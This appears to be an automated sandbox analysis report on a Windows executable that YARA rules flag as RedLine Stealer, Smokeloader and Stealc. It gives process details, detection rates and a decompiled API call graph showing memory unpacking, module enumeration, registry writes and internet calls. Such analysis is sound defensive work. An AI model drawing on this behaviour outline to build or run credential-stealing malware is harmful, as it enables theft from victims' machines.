                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  X-Powered-By: PHP/5.4.16
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oftJYlceiIcW2OGRv2WXeDUHxFl00oMGBwh20KwcZDnJs33xO8wgqVwXax4lYSgDP0EuUqH4XaygoLAdgCfJQQDmBaPXp0DVqhYAPEbtIIMYgtKafzJK%2FIz9AID9YH22%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8eff1fe42fa543d7-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2558&min_rtt=2275&rtt_var=1420&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=728&delivery_rate=642605&cwnd=198&unsent_bytes=0&cid=7318d5b01056c3f7&ts=744&x=0"
                                                  2024-12-10 17:58:42 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-12-10 17:58:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:12:58:36
                                                  Start date:10/12/2024
                                                  Path:C:\Users\user\Desktop\ssB9bjDQPf.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\ssB9bjDQPf.exe"
                                                  Imagebase:0x400000
                                                  File size:430'592 bytes
                                                  MD5 hash:26CEB3D9DCC1821192B39EEA6832D51D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3902949566.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:3
                                                  Start time:12:58:44
                                                  Start date:10/12/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe"
                                                  Imagebase:0x400000
                                                  File size:304'640 bytes
                                                  MD5 hash:5DE218396F8C0A36CEE31B8EE4FD0BFE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000003.1561878307.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1833942307.0000000000948000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 45%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:12:59:02
                                                  Start date:10/12/2024
                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 1304
                                                  Imagebase:0x4f0000
                                                  File size:483'680 bytes
                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:2.6%
                                                    Dynamic/Decrypted Code Coverage:3.7%
                                                    Signature Coverage:5.6%
                                                    Total number of Nodes:764
                                                    Total number of Limit Nodes:20
                                                    execution_graph 64999 24f003c 65000 24f0049 64999->65000 65014 24f0e0f SetErrorMode SetErrorMode 65000->65014 65005 24f0265 65006 24f02ce VirtualProtect 65005->65006 65009 24f030b 65006->65009 65007 24f0439 VirtualFree 65012 24f05f4 LoadLibraryA 65007->65012 65013 24f04be 65007->65013 65008 24f04e3 LoadLibraryA 65008->65013 65009->65007 65011 24f08c7 65012->65011 65013->65008 65013->65012 65015 24f0223 65014->65015 65016 24f0d90 65015->65016 65017 24f0dad 65016->65017 65018 24f0dbb GetPEB 65017->65018 65019 24f0238 VirtualAlloc 65017->65019 65018->65019 65019->65005 65020 402c04 InternetOpenW 65021 402e55 65020->65021 65024 402c37 Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 65020->65024 65041 40f8cf 65021->65041 65023 402e64 65032 42defd 65024->65032 65027 42defd std::_Locinfo::_Locinfo_dtor 26 API calls 65028 402e17 65027->65028 65029 42defd std::_Locinfo::_Locinfo_dtor 26 API calls 65028->65029 65030 402e29 InternetOpenUrlW 65029->65030 65030->65021 65031 402e44 InternetCloseHandle InternetCloseHandle 65030->65031 65031->65021 65033 42df1a 65032->65033 65036 42df0c 65032->65036 65048 42eac9 20 API calls __dosmaperr 65033->65048 65035 42df24 65049 42a59d 26 API calls _Deallocate 65035->65049 65036->65033 65039 42df4a 65036->65039 65038 402e09 65038->65027 65039->65038 65050 42eac9 20 API calls __dosmaperr 65039->65050 65042 40f8d8 65041->65042 65043 40f8da IsProcessorFeaturePresent 65041->65043 65042->65023 65045 40f94d 65043->65045 65051 40f911 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65045->65051 65047 40fa30 65047->65023 65048->65035 65049->65038 65050->65035 65051->65047 65052 40fc06 65053 40fc12 BuildCatchObjectHelperInternal 65052->65053 65081 40fff3 65053->65081 65055 40fc19 65056 40fd6c 65055->65056 65059 40fc43 65055->65059 65102 4104d3 4 API calls 2 library calls 65056->65102 65058 40fd73 65103 42ffc9 28 API calls _Atexit 65058->65103 65070 40fc82 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65059->65070 65096 42fcee 5 API calls Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 65059->65096 65061 40fd79 65104 42ff7b 28 API calls _Atexit 65061->65104 65064 40fc5c 65066 40fc62 65064->65066 65097 42fc92 5 API calls Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 65064->65097 65065 40fd81 65068 40fce3 65092 4105ed 65068->65092 65070->65068 65098 42a366 167 API calls 3 library calls 65070->65098 65072 40fce9 65073 40fcfe 65072->65073 65099 410623 GetModuleHandleW 65073->65099 65075 40fd05 65075->65058 65076 40fd09 65075->65076 65077 40fd12 65076->65077 65100 42ff6c 28 API calls _Atexit 65076->65100 65101 410182 13 API calls 2 library calls 65077->65101 65080 40fd1a 65080->65066 65082 40fffc 65081->65082 65105 41077b IsProcessorFeaturePresent 65082->65105 65084 410008 65106 428827 10 API calls 3 library calls 65084->65106 65086 41000d 65091 410011 65086->65091 65107 4317a1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65086->65107 65088 410028 65088->65055 65089 41001a 65089->65088 65108 428850 8 API calls 3 library calls 65089->65108 65091->65055 65109 426830 65092->65109 65095 410613 65095->65072 65096->65064 65097->65070 65098->65068 65099->65075 65100->65077 65101->65080 65102->65058 65103->65061 65104->65065 65105->65084 65106->65086 65107->65089 65108->65091 65110 410600 GetStartupInfoW 65109->65110 65110->65095 65111 432785 65116 432553 65111->65116 65115 4327ad 65121 43257e 65116->65121 65118 432771 65135 42a59d 26 API calls _Deallocate 65118->65135 65120 4326d0 65120->65115 65128 43d01c 65120->65128 65124 4326c7 65121->65124 65131 43c8ce 170 API calls 2 library calls 65121->65131 65123 432711 65123->65124 65132 43c8ce 170 API calls 2 library calls 65123->65132 65124->65120 65134 42eac9 20 API calls __dosmaperr 65124->65134 65126 432730 65126->65124 65133 43c8ce 170 API calls 2 library calls 65126->65133 65136 43c9f1 65128->65136 65130 43d037 65130->65115 65131->65123 65132->65126 65133->65124 65134->65118 65135->65120 65137 43c9fd BuildCatchObjectHelperInternal 65136->65137 65138 43ca0b 65137->65138 65140 43ca44 65137->65140 65154 42eac9 20 API calls __dosmaperr 65138->65154 65147 43cfcb 65140->65147 65141 43ca10 65155 42a59d 26 API calls _Deallocate 65141->65155 65146 43ca1a std::_Locinfo::_Locinfo_dtor 65146->65130 65157 43f941 65147->65157 65150 43ca68 65156 43ca91 LeaveCriticalSection __wsopen_s 65150->65156 65154->65141 65155->65146 65156->65146 65158 43f964 65157->65158 65159 43f94d 65157->65159 65161 43f983 65158->65161 65162 43f96c 65158->65162 65234 42eac9 20 API calls __dosmaperr 65159->65234 65238 434faa 10 API calls 2 library calls 65161->65238 65236 42eac9 20 API calls __dosmaperr 65162->65236 65164 43f952 65235 42a59d 26 API calls _Deallocate 65164->65235 65166 43f98a MultiByteToWideChar 65170 43f9b9 65166->65170 65171 43f9a9 GetLastError 65166->65171 65168 43f971 65237 42a59d 26 API calls _Deallocate 65168->65237 65240 4336a7 21 API calls 3 library calls 65170->65240 65239 42ea93 20 API calls 3 library calls 65171->65239 65172 43cfe1 65172->65150 65181 43d03c 65172->65181 65175 43f9c1 65176 43f9e9 65175->65176 65177 43f9c8 MultiByteToWideChar 65175->65177 65178 43346a _free 20 API calls 65176->65178 65177->65176 65179 43f9dd GetLastError 65177->65179 65178->65172 65241 42ea93 20 API calls 3 library calls 65179->65241 65242 43cd9f 65181->65242 65184 43d087 65260 43977e 65184->65260 65185 43d06e 65274 42eab6 20 API calls __dosmaperr 65185->65274 65188 43d073 65275 42eac9 20 API calls __dosmaperr 65188->65275 65189 43d08c 65190 43d095 65189->65190 65191 43d0ac 65189->65191 65276 42eab6 20 API calls __dosmaperr 65190->65276 65273 43cd0a CreateFileW 65191->65273 65195 43d09a 65277 42eac9 20 API calls __dosmaperr 65195->65277 65196 43d162 GetFileType 65199 43d1b4 65196->65199 65200 43d16d GetLastError 65196->65200 65198 43d137 GetLastError 65279 42ea93 20 API calls 3 library calls 65198->65279 65282 4396c7 21 API calls 3 library calls 65199->65282 65280 42ea93 20 API calls 3 library calls 65200->65280 65201 43d0e5 65201->65196 65201->65198 65278 43cd0a CreateFileW 65201->65278 65205 43d17b CloseHandle 65205->65188 65206 43d1a4 65205->65206 65281 42eac9 20 API calls __dosmaperr 65206->65281 65208 43d12a 65208->65196 65208->65198 65210 43d1d5 65212 43d221 65210->65212 65283 43cf1b 169 API calls 4 library calls 65210->65283 65211 43d1a9 65211->65188 65216 43d24e 65212->65216 65284 43cabd 167 API calls 4 library calls 65212->65284 65215 43d247 65215->65216 65218 43d25f 65215->65218 65285 4335cd 29 API calls 2 library calls 65216->65285 65219 43d009 65218->65219 65220 43d2dd CloseHandle 65218->65220 65228 43346a 65219->65228 65286 43cd0a CreateFileW 65220->65286 65222 43d308 65223 43d312 GetLastError 65222->65223 65224 43d257 65222->65224 65287 42ea93 20 API calls 3 library calls 65223->65287 65224->65219 65226 43d31e 65288 439890 21 API calls 3 library calls 65226->65288 65229 43349e _free 65228->65229 65230 433475 RtlFreeHeap 65228->65230 65229->65150 65230->65229 65231 43348a 65230->65231 65311 42eac9 20 API calls __dosmaperr 65231->65311 65233 433490 GetLastError 65233->65229 65234->65164 65235->65172 65236->65168 65237->65172 65238->65166 65239->65172 65240->65175 65241->65176 65243 43cdc0 65242->65243 65244 43cdda 65242->65244 65243->65244 65296 42eac9 20 API calls __dosmaperr 65243->65296 65289 43cd2f 65244->65289 65247 43cdcf 65297 42a59d 26 API calls _Deallocate 65247->65297 65249 43ce12 65250 43ce41 65249->65250 65298 42eac9 20 API calls __dosmaperr 65249->65298 65258 43ce94 65250->65258 65300 42ffdf 26 API calls 2 library calls 65250->65300 65253 43ce36 65299 42a59d 26 API calls _Deallocate 65253->65299 65254 43ce8f 65255 43cf0e 65254->65255 65254->65258 65301 42a5ca 11 API calls _Atexit 65255->65301 65258->65184 65258->65185 65259 43cf1a 65261 43978a BuildCatchObjectHelperInternal 65260->65261 65304 42e3ed EnterCriticalSection 65261->65304 65263 4397d8 65305 439887 65263->65305 65264 4397b6 65308 43955d 21 API calls 3 library calls 65264->65308 65265 439791 65265->65263 65265->65264 65270 439824 EnterCriticalSection 65265->65270 65268 439801 std::_Locinfo::_Locinfo_dtor 65268->65189 65269 4397bb 65269->65263 65309 4396a4 EnterCriticalSection 65269->65309 65270->65263 65271 439831 LeaveCriticalSection 65270->65271 65271->65265 65273->65201 65274->65188 65275->65219 65276->65195 65277->65188 65278->65208 65279->65188 65280->65205 65281->65211 65282->65210 65283->65212 65284->65215 65285->65224 65286->65222 65287->65226 65288->65224 65291 43cd47 65289->65291 65290 43cd62 65290->65249 65291->65290 65302 42eac9 20 API calls __dosmaperr 65291->65302 65293 43cd86 65303 42a59d 26 API calls _Deallocate 65293->65303 65295 43cd91 65295->65249 65296->65247 65297->65244 65298->65253 65299->65250 65300->65254 65301->65259 65302->65293 65303->65295 65304->65265 65310 42e435 LeaveCriticalSection 65305->65310 65307 43988e 65307->65268 65308->65269 65309->65263 65310->65307 65311->65233 65312 43410a 65313 434116 BuildCatchObjectHelperInternal 65312->65313 65314 434122 65313->65314 65315 434139 65313->65315 65346 42eac9 20 API calls __dosmaperr 65314->65346 65325 42caff EnterCriticalSection 65315->65325 65318 434149 65326 434186 65318->65326 65319 434127 65347 42a59d 26 API calls _Deallocate 65319->65347 65322 434155 65348 43417c LeaveCriticalSection __fread_nolock 65322->65348 65324 434132 std::_Locinfo::_Locinfo_dtor 65325->65318 65327 434194 65326->65327 65328 4341ae 65326->65328 65359 42eac9 20 API calls __dosmaperr 65327->65359 65349 432908 65328->65349 65331 434199 65360 42a59d 26 API calls _Deallocate 65331->65360 65332 4341b7 65356 4347d3 65332->65356 65336 4342bb 65338 4342c8 65336->65338 65345 43426e 65336->65345 65337 43423f 65339 43425c 65337->65339 65337->65345 65362 42eac9 20 API calls __dosmaperr 65338->65362 65361 43449f 31 API calls 4 library calls 65339->65361 65342 434266 65343 4341a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65342->65343 65343->65322 65345->65343 65363 43431b 30 API calls 2 library calls 65345->65363 65346->65319 65347->65324 65348->65324 65350 432914 65349->65350 65351 432929 65349->65351 65364 42eac9 20 API calls __dosmaperr 65350->65364 65351->65332 65353 432919 65365 42a59d 26 API calls _Deallocate 65353->65365 65355 432924 65355->65332 65366 434650 65356->65366 65358 4341d3 65358->65336 65358->65337 65358->65343 65359->65331 65360->65343 65361->65342 65362->65343 65363->65343 65364->65353 65365->65355 65367 43465c BuildCatchObjectHelperInternal 65366->65367 65368 434664 65367->65368 65369 43467c 65367->65369 65401 42eab6 20 API calls __dosmaperr 65368->65401 65370 434730 65369->65370 65375 4346b4 65369->65375 65406 42eab6 20 API calls __dosmaperr 65370->65406 65373 434669 65402 42eac9 20 API calls __dosmaperr 65373->65402 65374 434735 65407 42eac9 20 API calls __dosmaperr 65374->65407 65391 4396a4 EnterCriticalSection 65375->65391 65379 434671 std::_Locinfo::_Locinfo_dtor 65379->65358 65380 43473d 65408 42a59d 26 API calls _Deallocate 65380->65408 65381 4346ba 65383 4346f3 65381->65383 65384 4346de 65381->65384 65392 434755 65383->65392 65403 42eac9 20 API calls __dosmaperr 65384->65403 65387 4346e3 65404 42eab6 20 API calls __dosmaperr 65387->65404 65389 4346ee 65405 434728 LeaveCriticalSection __wsopen_s 65389->65405 65391->65381 65409 439921 65392->65409 65394 434767 65395 434780 SetFilePointerEx 65394->65395 65396 43476f 65394->65396 65398 434774 65395->65398 65399 434798 GetLastError 65395->65399 65422 42eac9 20 API calls __dosmaperr 65396->65422 65398->65389 65423 42ea93 20 API calls 3 library calls 65399->65423 65401->65373 65402->65379 65403->65387 65404->65389 65405->65379 65406->65374 65407->65380 65408->65379 65410 43992e 65409->65410 65413 439943 65409->65413 65424 42eab6 20 API calls __dosmaperr 65410->65424 65412 439933 65425 42eac9 20 API calls __dosmaperr 65412->65425 65417 439968 65413->65417 65426 42eab6 20 API calls __dosmaperr 65413->65426 65415 439973 65427 42eac9 20 API calls __dosmaperr 65415->65427 65417->65394 65419 43993b 65419->65394 65420 43997b 65428 42a59d 26 API calls _Deallocate 65420->65428 65422->65398 65423->65398 65424->65412 65425->65419 65426->65415 65427->65420 65428->65419 65429 af9004 65430 af9071 65429->65430 65433 af9816 65430->65433 65434 af9825 65433->65434 65437 af9fb6 65434->65437 65438 af9fd1 65437->65438 65439 af9fda CreateToolhelp32Snapshot 65438->65439 65440 af9ff6 Module32First 65438->65440 65439->65438 65439->65440 65441 af9815 65440->65441 65442 afa005 65440->65442 65444 af9c75 65442->65444 65445 af9ca0 65444->65445 65446 af9cb1 VirtualAlloc 65445->65446 65447 af9ce9 65445->65447 65446->65447 65448 4332de 65449 4332eb 65448->65449 65453 433303 65448->65453 65498 42eac9 20 API calls __dosmaperr 65449->65498 65451 4332f0 65499 42a59d 26 API calls _Deallocate 65451->65499 65454 43335e 65453->65454 65462 4332fb 65453->65462 65500 434ccd 21 API calls 2 library calls 65453->65500 65456 432908 __fread_nolock 26 API calls 65454->65456 65457 433376 65456->65457 65468 432e16 65457->65468 65459 43337d 65460 432908 __fread_nolock 26 API calls 65459->65460 65459->65462 65461 4333a9 65460->65461 65461->65462 65463 432908 __fread_nolock 26 API calls 65461->65463 65464 4333b7 65463->65464 65464->65462 65465 432908 __fread_nolock 26 API calls 65464->65465 65466 4333c7 65465->65466 65467 432908 __fread_nolock 26 API calls 65466->65467 65467->65462 65469 432e22 BuildCatchObjectHelperInternal 65468->65469 65470 432e2a 65469->65470 65475 432e42 65469->65475 65567 42eab6 20 API calls __dosmaperr 65470->65567 65472 432f08 65574 42eab6 20 API calls __dosmaperr 65472->65574 65474 432e2f 65568 42eac9 20 API calls __dosmaperr 65474->65568 65475->65472 65478 432e7b 65475->65478 65476 432f0d 65575 42eac9 20 API calls __dosmaperr 65476->65575 65480 432e8a 65478->65480 65481 432e9f 65478->65481 65569 42eab6 20 API calls __dosmaperr 65480->65569 65501 4396a4 EnterCriticalSection 65481->65501 65483 432e97 65576 42a59d 26 API calls _Deallocate 65483->65576 65485 432e8f 65570 42eac9 20 API calls __dosmaperr 65485->65570 65486 432ea5 65488 432ec1 65486->65488 65489 432ed6 65486->65489 65571 42eac9 20 API calls __dosmaperr 65488->65571 65502 432f29 65489->65502 65491 432e37 std::_Locinfo::_Locinfo_dtor 65491->65459 65494 432ec6 65572 42eab6 20 API calls __dosmaperr 65494->65572 65495 432ed1 65573 432f00 LeaveCriticalSection __wsopen_s 65495->65573 65498->65451 65499->65462 65500->65454 65501->65486 65503 432f53 65502->65503 65504 432f3b 65502->65504 65506 4332bd 65503->65506 65511 432f98 65503->65511 65586 42eab6 20 API calls __dosmaperr 65504->65586 65604 42eab6 20 API calls __dosmaperr 65506->65604 65507 432f40 65587 42eac9 20 API calls __dosmaperr 65507->65587 65510 4332c2 65605 42eac9 20 API calls __dosmaperr 65510->65605 65513 432fa3 65511->65513 65514 432f48 65511->65514 65519 432fd3 65511->65519 65588 42eab6 20 API calls __dosmaperr 65513->65588 65514->65495 65515 432fb0 65606 42a59d 26 API calls _Deallocate 65515->65606 65517 432fa8 65589 42eac9 20 API calls __dosmaperr 65517->65589 65521 432fec 65519->65521 65522 433012 65519->65522 65523 43302e 65519->65523 65521->65522 65527 432ff9 65521->65527 65590 42eab6 20 API calls __dosmaperr 65522->65590 65593 4336a7 21 API calls 3 library calls 65523->65593 65526 433017 65591 42eac9 20 API calls __dosmaperr 65526->65591 65577 43d365 65527->65577 65528 433045 65531 43346a _free 20 API calls 65528->65531 65536 43304e 65531->65536 65532 433197 65534 43320d 65532->65534 65537 4331b0 GetConsoleMode 65532->65537 65533 43301e 65592 42a59d 26 API calls _Deallocate 65533->65592 65539 433211 ReadFile 65534->65539 65538 43346a _free 20 API calls 65536->65538 65537->65534 65540 4331c1 65537->65540 65541 433055 65538->65541 65542 433285 GetLastError 65539->65542 65543 43322b 65539->65543 65540->65539 65545 4331c7 ReadConsoleW 65540->65545 65546 43307a 65541->65546 65547 43305f 65541->65547 65548 433292 65542->65548 65549 4331e9 65542->65549 65543->65542 65544 433202 65543->65544 65559 433250 65544->65559 65560 433267 65544->65560 65564 433029 __fread_nolock 65544->65564 65545->65544 65552 4331e3 GetLastError 65545->65552 65596 4347ee 65546->65596 65594 42eac9 20 API calls __dosmaperr 65547->65594 65602 42eac9 20 API calls __dosmaperr 65548->65602 65549->65564 65599 42ea93 20 API calls 3 library calls 65549->65599 65552->65549 65553 43346a _free 20 API calls 65553->65514 65555 433297 65603 42eab6 20 API calls __dosmaperr 65555->65603 65557 433064 65595 42eab6 20 API calls __dosmaperr 65557->65595 65600 432c45 31 API calls 3 library calls 65559->65600 65563 43327e 65560->65563 65560->65564 65601 432a85 29 API calls __fread_nolock 65563->65601 65564->65553 65566 433283 65566->65564 65567->65474 65568->65491 65569->65485 65570->65483 65571->65494 65572->65495 65573->65491 65574->65476 65575->65483 65576->65491 65578 43d372 65577->65578 65579 43d37f 65577->65579 65607 42eac9 20 API calls __dosmaperr 65578->65607 65583 43d38b 65579->65583 65608 42eac9 20 API calls __dosmaperr 65579->65608 65582 43d377 65582->65532 65583->65532 65584 43d3ac 65609 42a59d 26 API calls _Deallocate 65584->65609 65586->65507 65587->65514 65588->65517 65589->65515 65590->65526 65591->65533 65592->65564 65593->65528 65594->65557 65595->65564 65597 434755 __fread_nolock 28 API calls 65596->65597 65598 434804 65597->65598 65598->65527 65599->65564 65600->65564 65601->65566 65602->65555 65603->65564 65604->65510 65605->65515 65606->65514 65607->65582 65608->65584 65609->65582 65610 402bad RegCreateKeyExW 65611 402bdb RegSetValueExW 65610->65611 65612 402bef 65610->65612 65611->65612 65613 402bf4 RegCloseKey 65612->65613 65614 402bfd 65612->65614 65613->65614 65615 404b8e 65616 404b9a Concurrency::details::_TaskCollection::_Alias 65615->65616 65621 40fb0c 65616->65621 65620 404bba Concurrency::details::_TaskCollection::_Alias Concurrency::details::LockQueueNode::DerefTimerNode 65623 40fb11 65621->65623 65624 404ba3 65623->65624 65626 40fb2d Concurrency::details::_TaskCollection::_Alias 65623->65626 65645 42ad7e 65623->65645 65652 42f450 7 API calls 2 library calls 65623->65652 65629 4051d0 65624->65629 65653 42860d RaiseException 65626->65653 65628 4103cc 65630 4051dc Concurrency::details::_TaskCollection::_Alias __Cnd_init 65629->65630 65632 4051f4 __Mtx_init 65630->65632 65664 40ce32 28 API calls std::_Throw_Cpp_error 65630->65664 65633 40521b 65632->65633 65665 40ce32 28 API calls std::_Throw_Cpp_error 65632->65665 65656 4010ea 65633->65656 65639 40526a 65640 40527f Concurrency::details::LockQueueNode::DerefTimerNode 65639->65640 65667 401128 30 API calls std::_Cnd_waitX 65639->65667 65668 401109 65640->65668 65644 4052a4 Concurrency::details::_TaskCollection::_Alias 65644->65620 65650 4336a7 _Atexit 65645->65650 65646 4336e5 65655 42eac9 20 API calls __dosmaperr 65646->65655 65648 4336d0 RtlAllocateHeap 65649 4336e3 65648->65649 65648->65650 65649->65623 65650->65646 65650->65648 65654 42f450 7 API calls 2 library calls 65650->65654 65652->65623 65653->65628 65654->65650 65655->65649 65672 40d313 65656->65672 65659 401103 65661 40cef3 65659->65661 65696 42e114 65661->65696 65664->65632 65665->65633 65666 40ce32 28 API calls std::_Throw_Cpp_error 65666->65639 65667->65639 65669 401115 __Mtx_unlock 65668->65669 65670 401122 65669->65670 66024 40ce32 28 API calls std::_Throw_Cpp_error 65669->66024 65670->65644 65676 40d06d 65672->65676 65675 40ce32 28 API calls std::_Throw_Cpp_error 65675->65659 65677 40d0c3 65676->65677 65678 40d095 GetCurrentThreadId 65676->65678 65679 40d0c7 GetCurrentThreadId 65677->65679 65680 40d0ed 65677->65680 65681 40d0a0 GetCurrentThreadId 65678->65681 65691 40d0bb 65678->65691 65683 40d0d6 65679->65683 65682 40d186 GetCurrentThreadId 65680->65682 65686 40d10d 65680->65686 65681->65691 65682->65683 65684 40d1dd GetCurrentThreadId 65683->65684 65683->65691 65684->65691 65685 40f8cf Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 65689 4010f6 65685->65689 65694 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65686->65694 65689->65659 65689->65675 65690 40d145 GetCurrentThreadId 65690->65683 65692 40d118 __Xtime_diff_to_millis2 65690->65692 65691->65685 65692->65683 65692->65690 65692->65691 65695 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65692->65695 65694->65692 65695->65692 65697 42e121 65696->65697 65698 42e135 65696->65698 65719 42eac9 20 API calls __dosmaperr 65697->65719 65710 42e0cb 65698->65710 65701 42e126 65720 42a59d 26 API calls _Deallocate 65701->65720 65704 42e14a CreateThread 65706 42e175 65704->65706 65707 42e169 GetLastError 65704->65707 65741 42dfc0 65704->65741 65705 405257 65705->65639 65705->65666 65722 42e03d 65706->65722 65721 42ea93 20 API calls 3 library calls 65707->65721 65730 434d2a 65710->65730 65713 43346a _free 20 API calls 65714 42e0e4 65713->65714 65715 42e103 65714->65715 65716 42e0eb GetModuleHandleExW 65714->65716 65717 42e03d __Thrd_start 22 API calls 65715->65717 65716->65715 65718 42e10d 65717->65718 65718->65704 65718->65706 65719->65701 65720->65705 65721->65706 65723 42e04a 65722->65723 65724 42e06e 65722->65724 65725 42e050 CloseHandle 65723->65725 65726 42e059 65723->65726 65724->65705 65725->65726 65727 42e068 65726->65727 65728 42e05f FreeLibrary 65726->65728 65729 43346a _free 20 API calls 65727->65729 65728->65727 65729->65724 65731 434d37 65730->65731 65732 434d77 65731->65732 65733 434d62 HeapAlloc 65731->65733 65738 434d4b _Atexit 65731->65738 65740 42eac9 20 API calls __dosmaperr 65732->65740 65734 434d75 65733->65734 65733->65738 65736 42e0db 65734->65736 65736->65713 65738->65732 65738->65733 65739 42f450 7 API calls 2 library calls 65738->65739 65739->65738 65740->65736 65742 42dfcc _Atexit 65741->65742 65743 42dfd3 GetLastError ExitThread 65742->65743 65744 42dfe0 65742->65744 65757 431eda GetLastError 65744->65757 65746 42dfe5 65777 435571 65746->65777 65750 42dffb 65784 401169 65750->65784 65758 431ef0 65757->65758 65759 431ef6 65757->65759 65792 435111 11 API calls 2 library calls 65758->65792 65761 434d2a _Atexit 20 API calls 65759->65761 65763 431f45 SetLastError 65759->65763 65762 431f08 65761->65762 65764 431f10 65762->65764 65793 435167 11 API calls 2 library calls 65762->65793 65763->65746 65766 43346a _free 20 API calls 65764->65766 65768 431f16 65766->65768 65767 431f25 65767->65764 65769 431f2c 65767->65769 65770 431f51 SetLastError 65768->65770 65794 431d4c 20 API calls _Atexit 65769->65794 65795 42df7d 167 API calls _Atexit 65770->65795 65772 431f37 65774 43346a _free 20 API calls 65772->65774 65776 431f3e 65774->65776 65775 431f5d 65776->65763 65776->65770 65778 435596 65777->65778 65779 43558c 65777->65779 65796 434e93 5 API calls 2 library calls 65778->65796 65781 40f8cf Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 65779->65781 65782 42dff0 65781->65782 65782->65750 65791 4354a4 10 API calls 2 library calls 65782->65791 65783 4355ad 65783->65779 65797 40155a Sleep 65784->65797 65799 405800 65784->65799 65785 401173 65788 42e199 65785->65788 65992 42e074 65788->65992 65790 42e1a6 65791->65750 65792->65759 65793->65767 65794->65772 65795->65775 65796->65783 65798 4016d5 65797->65798 65800 40580c Concurrency::details::_TaskCollection::_Alias 65799->65800 65801 4010ea std::_Cnd_initX 35 API calls 65800->65801 65802 405821 __Cnd_signal 65801->65802 65803 405839 65802->65803 65856 40ce32 28 API calls std::_Throw_Cpp_error 65802->65856 65805 401109 std::_Cnd_initX 28 API calls 65803->65805 65806 405842 65805->65806 65812 4016df 65806->65812 65833 4029f4 InternetOpenW 